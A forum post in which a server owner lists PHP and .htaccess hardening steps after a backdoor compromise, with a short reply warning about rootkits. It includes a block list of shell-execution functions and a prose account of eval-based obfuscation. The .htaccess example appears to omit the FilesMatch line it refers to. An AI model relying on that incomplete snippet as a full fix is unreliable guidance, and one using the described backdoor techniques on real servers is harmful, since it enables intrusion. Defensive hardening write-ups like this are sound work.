Ok, so my server got hacked last week. The hacker attacked an out-of-date 3rd party editor (in php) and implanted a backdoor script in PHP and did serious damages to my sites. I spent a whole weekend cleaning the backdoor scripts and any malicious codes he left on my server. And in order to avoid being hacked again, I did the following to my server:
-
turn off file_upload in PHP. Since the hacked uploaded the backdoor through PHP, I disabled the function in php.ini. So now I can only upload through ftp.
-
disable create_function in php. None of my software uses this function. The hacker used this function the same way as eval() to execute commands in as strings.
-
disable popen,exec,system,passthru,proc_open,shell_exec,show_source,phpinfo in php.ini. These functions are primarily used by the back door script to modify my files and directories.
-
Install suhosin. Find legal functions that are called within eval(), put them in the suhosin.executor.eval.whitelist. Hacker put malicious codes in my program, and obfiscated it with base64_encode, and then execute them within eval(). So I only allow a couple of legal functions being called within eval().
-
Turn on suhosin.executor.disable_emodifier. The hacker put another obfiscated code in my program, and used preg_replace() e modifier to execute whatever php commands he put on his browser. So he could upload or modify any files on the server through his browser. (Since I turned off file_upload, he could not upload any more, but still he could modify and delete files as he wanted).
By disabling the create_function, preg_replace() e modifier and limiting eval(), even there are malicious codes left uncleaned on my server, the hacker could not do anything. These are the 3 most dangerous functions in PHP.
- Add .htaccess to every folder but the root directory and forbidding PHP from being executed directly from browser:
Order Deny,Allow
Deny from all
I put another * after Php because I found a backdoor file that was named as missing.php.DISABLED and this can still be executed if I do not put * after php
-
Set the root directory (the only place that allows to execute .php) as read only. Set all files in that folder read-only. So the hacker could not upload any new back door script to the only directory where the php can be executed. Neither could he modify the files in that directory.
-
For the wordpress login, I added
Order Deny,Allow
Deny from all
allow from xxx.xxx.xxx.xxx
to the .htaccess in the root directory, where xxx.xxx.xxx.xxx is my ip.
- Set all .htaccess read only.
Well, this is what I can do to strenthen the security of my server. Did I miss anything?
Thank you for your advice.
Unless you reimaged the machine from known-clean install media, you can’t know there isn’t a lingering rootkit.